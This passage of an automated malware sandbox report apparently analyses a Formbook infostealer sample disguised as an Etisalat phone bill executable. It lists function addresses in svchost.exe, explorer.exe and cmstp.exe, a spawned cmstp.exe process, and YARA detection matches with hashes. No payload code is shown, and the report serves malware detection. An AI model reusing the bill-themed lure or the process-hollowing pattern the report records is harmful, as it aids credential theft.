          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030856302_2_03085630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031095C32_2_031095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD22_2_03003FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD52_2_03003FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
          Source: C:\Windows\explorer.exeCode function: 3_2_1095F2323_2_1095F232
          Source: C:\Windows\explorer.exeCode function: 3_2_109550823_2_10955082
          Source: C:\Windows\explorer.exeCode function: 3_2_1095E0363_2_1095E036
          Source: C:\Windows\explorer.exeCode function: 3_2_109625CD3_2_109625CD
          Source: C:\Windows\explorer.exeCode function: 3_2_1095C9123_2_1095C912
          Source: C:\Windows\explorer.exeCode function: 3_2_10956D023_2_10956D02
          Source: C:\Windows\explorer.exeCode function: 3_2_10959B303_2_10959B30
          Source: C:\Windows\explorer.exeCode function: 3_2_10959B323_2_10959B32
          Source: C:\Windows\explorer.exeCode function: 3_2_10DFC0823_2_10DFC082
          Source: C:\Windows\explorer.exeCode function: 3_2_10E050363_2_10E05036
          Source: C:\Windows\explorer.exeCode function: 3_2_10E095CD3_2_10E095CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10DFDD023_2_10DFDD02
          Source: C:\Windows\explorer.exeCode function: 3_2_10E039123_2_10E03912
          Source: C:\Windows\explorer.exeCode function: 3_2_10E062323_2_10E06232
          Source: C:\Windows\explorer.exeCode function: 3_2_10E00B303_2_10E00B30
          Source: C:\Windows\explorer.exeCode function: 3_2_10E00B323_2_10E00B32
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADB6344_2_00ADB634
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DEE4F64_2_04DEE4F6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF24464_2_04DF2446
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DE44204_2_04DE4420
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04E005914_2_04E00591
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D405354_2_04D40535
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D5C6E04_2_04D5C6E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D3C7C04_2_04D3C7C0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D647504_2_04D64750
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D407704_2_04D40770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DD20004_2_04DD2000
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF81CC4_2_04DF81CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04E001AA4_2_04E001AA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF41A24_2_04DF41A2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DC81584_2_04DC8158
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DDA1184_2_04DDA118
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D301004_2_04D30100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DC02C04_2_04DC02C0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DE02744_2_04DE0274
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04E003E64_2_04E003E6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D4E3F04_2_04D4E3F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFA3524_2_04DFA352
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D30CF24_2_04D30CF2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DE0CB54_2_04DE0CB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D40C004_2_04D40C00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D3ADE04_2_04D3ADE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D58DBF4_2_04D58DBF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DDCD1F4_2_04DDCD1F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D4AD004_2_04D4AD00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFEEDB4_2_04DFEEDB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D52E904_2_04D52E90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFCE934_2_04DFCE93
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D40E594_2_04D40E59
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFEE264_2_04DFEE26
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D32FC84_2_04D32FC8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D4CFE04_2_04D4CFE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DBEFA04_2_04DBEFA0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DB4F404_2_04DB4F40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D60F304_2_04D60F30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DE2F304_2_04DE2F30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D82F284_2_04D82F28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D6E8F04_2_04D6E8F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D268B84_2_04D268B8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D4A8404_2_04D4A840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D428404_2_04D42840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04E0A9A64_2_04E0A9A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D429A04_2_04D429A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D569624_2_04D56962
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D3EA804_2_04D3EA80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF6BD74_2_04DF6BD7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFAB404_2_04DFAB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D314604_2_04D31460
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFF43F4_2_04DFF43F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04E095C34_2_04E095C3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DDD5B04_2_04DDD5B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF75714_2_04DF7571
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF16CC4_2_04DF16CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D856304_2_04D85630
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFF7B04_2_04DFF7B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DEF0CC4_2_04DEF0CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D470C04_2_04D470C0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF70E94_2_04DF70E9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFF0E04_2_04DFF0E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D4B1B04_2_04D4B1B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04E0B16B4_2_04E0B16B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D2F1724_2_04D2F172
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D7516C4_2_04D7516C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D5B2C04_2_04D5B2C0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DE12ED4_2_04DE12ED
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D452A04_2_04D452A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D8739A4_2_04D8739A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D2D34C4_2_04D2D34C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF132D4_2_04DF132D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFFCF24_2_04DFFCF2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DB9C324_2_04DB9C32
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D5FDC04_2_04D5FDC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF1D5A4_2_04DF1D5A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D43D404_2_04D43D40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF7D734_2_04DF7D73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D49EB04_2_04D49EB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D03FD24_2_04D03FD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D03FD54_2_04D03FD5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D41F924_2_04D41F92
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFFFB14_2_04DFFFB1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFFF094_2_04DFFF09
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D438E04_2_04D438E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DAD8004_2_04DAD800
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D499504_2_04D49950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D5B9504_2_04D5B950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DD59104_2_04DD5910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DEDAC64_2_04DEDAC6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DDDAAC4_2_04DDDAAC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D85AA04_2_04D85AA0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DE1AA34_2_04DE1AA3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFFA494_2_04DFFA49
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DF7A464_2_04DF7A46
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DB3A6C4_2_04DB3A6C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DB5BF04_2_04DB5BF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D7DBF94_2_04D7DBF9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D5FB804_2_04D5FB80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04DFFB764_2_04DFFB76
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5E1AE4_2_02E5E1AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5D5964_2_02E5D596
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E49E504_2_02E49E50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E42FB04_2_02E42FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5DF374_2_02E5DF37
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E42D904_2_02E42D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 111 times
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: String function: 00B88B40 appears 42 times
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: String function: 00B80D27 appears 70 times
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: String function: 00B67F41 appears 35 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04DAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04D2B970 appears 280 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04DBF290 appears 105 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04D87E54 appears 111 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04D75130 appears 58 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 00ADE951 appears 100 times
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000004063000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Details of Your Etisalat Summary Bill for the Month of May 2024.exe
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976988587.000000000420D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Details of Your Etisalat Summary Bill for the Month of May 2024.exe
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"Jump to behavior
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4443389899.0000000010977000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
